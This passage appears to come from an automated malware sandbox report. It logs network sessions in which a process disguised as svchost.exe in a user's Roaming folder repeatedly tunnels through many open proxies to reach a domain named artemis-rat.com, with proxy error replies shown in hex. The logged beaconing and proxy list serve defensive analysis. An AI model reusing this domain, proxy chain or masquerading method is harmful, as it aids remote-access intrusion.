                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2086192.168.2.556519184.170.245.148414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.753207922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2087192.168.2.556652172.67.181.118043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.774467945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.928745985 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2088192.168.2.556666104.20.56.718043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.775298119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.929900885 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2089192.168.2.55537191.134.140.1605732043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.775546074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.208085060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.646426916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.646327972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.443057060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.942904949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2090192.168.2.556438220.248.70.237900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.775547981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.102102995 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2091192.168.2.556646104.16.143.1278043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.775659084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.930010080 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2092192.168.2.556651104.25.231.1848043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.775665998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.930118084 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2093192.168.2.556648172.67.181.1498043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.775731087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.929944992 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2094192.168.2.556681104.16.105.158043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.777841091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.931910038 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2095192.168.2.556414154.236.179.226198143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.783364058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.564022064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.742468119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.965069056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.366430998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2096192.168.2.556874202.159.60.6544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.784373045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2097192.168.2.556876202.159.60.6544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.785128117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2098192.168.2.556877202.159.60.6544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.785880089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2099192.168.2.556398222.220.102.159800043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.786967993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2100192.168.2.55644062.33.53.248312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.786968946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2101192.168.2.556878202.159.60.6544343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.787044048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2102192.168.2.556421139.99.148.90312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.795222044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.564080954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.080266953 CET536INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: squid/3.5.20
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3711
                                                                                    X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Proxy-Authenticate: Basic realm="Squid Basic Authentication"
                                                                                    X-Cache: MISS from ns547184.ip-139-99-148.net
                                                                                    X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                                                                                    Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-/


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2103192.168.2.55658838.162.3.175312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.796520948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.241336107 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2104192.168.2.55668923.227.38.1988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.803762913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.958096981 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2105192.168.2.556701104.25.244.708043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.806272984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.960486889 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2106192.168.2.55688741.86.252.9144343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.807176113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2107192.168.2.55688941.86.252.9144343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.807758093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
